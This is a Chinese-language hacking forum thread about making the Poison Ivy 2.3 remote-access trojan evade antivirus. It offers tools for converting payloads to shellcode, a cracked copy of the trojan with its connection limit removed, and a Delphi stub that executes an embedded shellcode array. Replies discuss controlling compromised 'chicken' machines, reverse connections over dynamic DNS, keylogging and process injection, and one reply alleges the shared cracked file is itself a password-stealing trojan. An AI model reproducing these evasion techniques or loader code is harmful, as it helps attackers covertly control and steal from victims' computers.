38 12
发新话题
打印

[原创]关于 Posion Ivy 2.3.0 免杀的思路[6.30更新]

[原创]关于 Posion Ivy 2.3.0 免杀的思路[6.30更新]

文章作者:mika[EST]

附件

bin2shellcode.rar (1 KB)

2007-6-22 21:32, 下载次数: 634

将二进制转化为shellcode形式

PIShellCode.zip (752 KB)

2007-6-22 21:32, 下载次数: 1448

delphi版的shellcode工具

Poison Ivy 2.3.0.unpacked-cracked.rar (674 KB)

2007-6-22 21:32, 下载次数: 1142

脱壳后的和修改了连接数限制的PI2.3

我的部落格:http://www.mikwawa.cn/

TOP

PI还支持Plugins,如果有高手能做个通过网站上的文件自动更新IP地址的就好了,就像是反弹木马那样~~~~
否则像我用ADSL这种动态IP的人就郁闷了~~~~~

TOP

但说到底,好像没有教我们怎么变形..

TOP

引用:
引用第3楼xiao2004于2007-06-22 22:40发表的 :
但说到底,好像没有教我们怎么变形..
因为要说变形那真的有太多话要说,而且涉及的东西又比较多一点,所以俺就偷偷懒只介绍一下思路吧。
不过针对PI来说,用最后我说的那种思路就足够应付了。
我的部落格:http://www.mikwawa.cn/

TOP

引用:
引用第2楼igotcha于2007-06-22 22:39发表的 :
PI还支持Plugins,如果有高手能做个通过网站上的文件自动更新IP地址的就好了,就像是反弹木马那样~~~~
否则像我用ADSL这种动态IP的人就郁闷了~~~~~
不是吧?PI从一开始就支持动态域名的啊,你申请个动态域名不就得了?
我的部落格:http://www.mikwawa.cn/

TOP

最好。能有一个。shellcode 加密的。可以设置加密钥匙。呵呵。这样免杀多方便。

TOP

PV 虽然是不错的东西``但是它的稳定性和连接限制`是最大的问题`
没有解决这二个 问题``只能算是一个半成品的东西``
当然我说的是 目前MS还没有人``破解````即使有破解的```稳定性也极差````
如果有兄弟```有比较稳定和无连接限制的``发短信告诉我 下``谢谢````

TOP

2.3已经非常稳定了,而且增加了插件的功能,修复了很多bug的。至于连接数的问题,俺不太懂破解。不过2.3支持多个client,有个麻烦的办法就是当连接数达到极限后再生成一个服务端和客户端,只是修改连接的端口就行。然后覆盖原来的, 麻烦,不过俺觉得费神去破解那才麻烦呢
我的部落格:http://www.mikwawa.cn/

TOP

引用:
引用第7楼aspshell于2007-06-24 15:29发表的 :
PV 虽然是不错的东西``但是它的稳定性和连接限制`是最大的问题`
没有解决这二个 问题``只能算是一个半成品的东西``
当然我说的是 目前MS还没有人``破解````即使有破解的```稳定性也极差````
如果有兄弟```有比较稳定和无连接限制的``发短信告诉我 下``谢谢````
http://bbs.pediy.com/showthread.php?t=39213
BLOG: http://blog.csdn.net/hkbyest

TOP

引用:
为了方便大家从bin格式的文件生成文本格式的shellcode,而且方便大家生成上面的C代码,我写了一个perl脚本用来帮助大家生成perl和c格式的shellcode,代码如下
本来就可以生成c的shellcode,多此一举!!
tapion 1.0c变形的bin不能超过1500字节,楼主你测试了没有呀?

TOP

引用:
引用第13楼lhn于2007-06-25 15:04发表的 :

本来就可以生成c的shellcode,多此一举!!
tapion 1.0c变形的bin不能超过1500字节,楼主你测试了没有呀?
不是多此哦,因为有一些shellcode变形工具变形生成出来的是bin格式的文件,所以你需要用这个脚本来转换。
tapion我没用过,我是用手工变形的。
我的部落格:http://www.mikwawa.cn/

TOP

在网上找到了一个工具,好像是famdiy组织上的,用delphi写的。它可以直接把shellcode生成为一个pe文件,省去你用编译器再去编译了。需要注意的是你在生成服务端时要选择delphi格式的shellcode才行,然后用这个工具处理一下。工具我更新到顶贴了!
我的部落格:http://www.mikwawa.cn/

TOP

引用:
引用第10楼evilbogy于2007-06-24 19:56发表的 :



http://bbs.pediy.com/showthread.php?t=39213
看雪的这篇文章我看过``不过他只是教人如何去壳``却没有达到实质的稳定+连接限制等等解决``
所以也只能算脱壳一类的文章而已````所以向来不用PV````我一直再等牛人 放出那稳定版本+无连接限制````我见过有大牛 一下控制19W鸡鸡```可是人家不会给偶``花钱买``人家也舍不得卖```

TOP

楼上的弟弟,俺看了一下你说的那个帖子。俺学习了一下,把2.3的壳给撬开了,然后用0D学习了一下代码,顺便该了一下里面的连接数限制,现在是无连接数限制了。(不要拿去做坏事哦,否则小心被你自己的肉鸡给DDOS了,嘿嘿)。我把弄好的更新的顶贴了!嘿嘿
我的部落格:http://www.mikwawa.cn/

TOP

这个东西bug太多了,比如说你把它插入的那个进程结束掉(explorer、svchost等等),它的服务端里就会出现两个一模一样的东东。

还有连接端口这些东东在IS下一目了然。这样的隐蔽性,能让人放心吗?
最汗的是,中了之后鼠标会频繁地成漏斗状,虽然持续时间很短,但也够让人起疑了。
相对来说,我更喜欢玫瑰的ncph5.0,虽然很大一个IE进程比较碍眼,但也比poison稳定,而且要那么多功能干嘛,提供一个远程shell就足够了。

TOP

引用:
引用第17楼aspshell于2007-06-30 07:11发表的 :

看雪的这篇文章我看过``不过他只是教人如何去壳``却没有达到实质的稳定+连接限制等等解决``
所以也只能算脱壳一类的文章而已````所以向来不用PV````我一直再等牛人 放出那稳定版本+无连接限制````我见过有大牛 一下控制19W鸡鸡```可是人家不会给偶``花钱买``人家也舍不得卖```
貌似您看帖不够仔细,前面是脱壳,后面才是破解连接限制啊...
BLOG: http://blog.csdn.net/hkbyest

TOP

最近也在研究这个的免杀 19楼的 我插SVCHOST 好象没出现你的状况 2003的 ,软件不错。。

TOP

如果勾选了键盘纪录。。
运行后系统会短暂死屏幕、

我选择了插入进程svchost.exe
但是都不成功
XP-SP2
^_^    社会需求将决定你的价值    ^_^

TOP

张贴一个DELPHI的的PE生成程序~
Put PI ShellCode (Delphi Format)There....


program server;


const
PIshellcode: array[0..6528] of byte =
(
//here insert Shellcode  
);


var
ShellCodeProc:procedure;
begin

ShellCodeProc := @PIshellcode ;
ShellCodeProc();

end.
en因为喜爱所以相聚

TOP

引用:
引用第18楼asoftforg于2007-07-14 14:09发表的 :
张贴一个DELPHI的的PE生成程序~
Put PI ShellCode (Delphi Format)There....


program server;
.......
这个有人试过吗/??现在我机子上没DEV了``~~

TOP

——真是麻烦啊,就没有一步到位的啊??
——有,在迅雷搜索一下就有傻瓜工具了,自己再改一下就行的!
Uing Duo

TOP

c:\windows\comment.c(530) : error C2094: label 'PIshellcode' was undefined

TOP

thanks mike hard work
do you remove conection limt from it ?
and how ican change stub with undetected i made ?

TOP

大哥 我是菜鸟.用那个tapion_pack01c 他说 Error: shellcode size is larger then 1500 bytes
不行啊. 还有类似的 软件吗? 介绍个啊...谢谢

TOP

描述:脱壳后的和修改了连接数限制的PI2.3
附件: Poison Ivy 2.3.0.unpacked-cracked.rar (674 K)

这个是PWD.ONLINEGAME木马!!!

TOP

 38 12
发新话题